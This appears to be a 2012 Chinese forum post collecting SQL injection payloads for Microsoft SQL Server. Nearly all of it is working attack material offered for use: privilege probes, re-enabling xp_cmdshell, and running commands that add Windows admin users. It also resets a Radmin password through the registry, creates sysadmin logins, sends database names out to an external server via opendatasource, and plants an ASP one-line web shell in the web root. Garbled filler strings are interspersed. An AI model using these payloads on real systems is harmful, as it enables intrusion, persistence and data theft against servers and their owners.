

作者: admin    时间: 2012-9-15 14:40
标题: 常用的一些注入命令
//看看是什么权限的
and 1=(Select IS_MEMBER('db_owner'))
And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--

//检测是否有读取某数据库的权限
and 1= (Select HAS_DBACCESS('master'))
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --


数字类型
and char(124)%2Buser%2Bchar(124)=0

字符类型
' and char(124)%2Buser%2Bchar(124)=0 and ''='

搜索类型
' and char(124)%2Buser%2Bchar(124)=0 and '%'='

爆用户名
and user>0
' and user>0 and ''='
" f" ~" b! N4 w; O: j
检测是否为SA权限
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --

检测是不是MSSQL数据库
and exists (select * from sysobjects);--

检测是否支持多行(堆叠)语句
;declare @d int;--
- P& {4 x0 \! x) l. B
恢复 xp_cmdshell
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--


select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version')

//-----------------------
//       执行命令
//-----------------------
首先开启沙盘模式:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

然后利用jet.oledb执行系统命令
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')

执行命令
;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--

EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
' T% K; O. `3 {5 B" y0 A+ O. D% |: d; u. B/ |
判断xp_cmdshell扩展存储过程是否存在:
http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')

写注册表:
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1

REG_SZ

读注册表
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'

读取目录内容
exec master..xp_dirtree 'c:\winnt\system32\',1,1


数据库备份
backup database pubs to disk = 'c:\123.bak'

//爆出长度
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--

% T4 h: s5 c8 o7 N# x. f/ E; |) l, _+ ~! U

更改sa口令方法:用sql综合利用工具连接后,执行命令:
exec sp_password NULL,'新密码','sa'

添加和删除一个SA权限的用户test:
exec master.dbo.sp_addlogin test,9530772
exec master.dbo.sp_addsrvrolemember test,sysadmin

删除扩展存储过程xp_cmdshell的语句:
exec sp_dropextendedproc 'xp_cmdshell'

添加扩展存储过程
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
GRANT exec On xp_proxiedadata TO public
: q/ h* k( V1 `$ j0 ]3 Z. o
# V- ]2 `3 e9 @3 X- z
停掉或激活某个服务。

exec master..xp_servicecontrol 'stop','schedule'
exec master..xp_servicecontrol 'start','schedule'

dbo.xp_subdirs

只列某个目录下的子目录。
xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'

dbo.xp_makecab

将多个档案压缩到某个目标档案之内。
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。

dbo.xp_makecab
'c:\test.cab','mszip',1,
'C:\Inetpub\wwwroot\SQLInject\login.asp',
'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'

xp_terminate_process

停掉某个执行中的程序,但赋予的参数是 Process ID。
利用「工作管理员」,透过选单「检视」-「选择字段」勾选 PID,就可以看到每个执行程序的 Process ID。

xp_terminate_process 2484

xp_unpackcab

解开压缩档。

xp_unpackcab 'c:\test.cab','c:\temp',1

4 o  ^' Q: [" |5 I. y( o
某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234。

create database lcx;
Create TABLE ku(name nvarchar(256) null);
Create TABLE biao(id int NULL,name nvarchar(256) null);

//得到数据库名
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases


//在Master中创建表,看看权限怎样
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--

用 sp_makewebtask直接在web目录里写入一句话马:
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--

//更新表内容
Update films SET kind = 'Dramatic' Where id = 123

//删除内容
delete from table_name where Stockid = 3



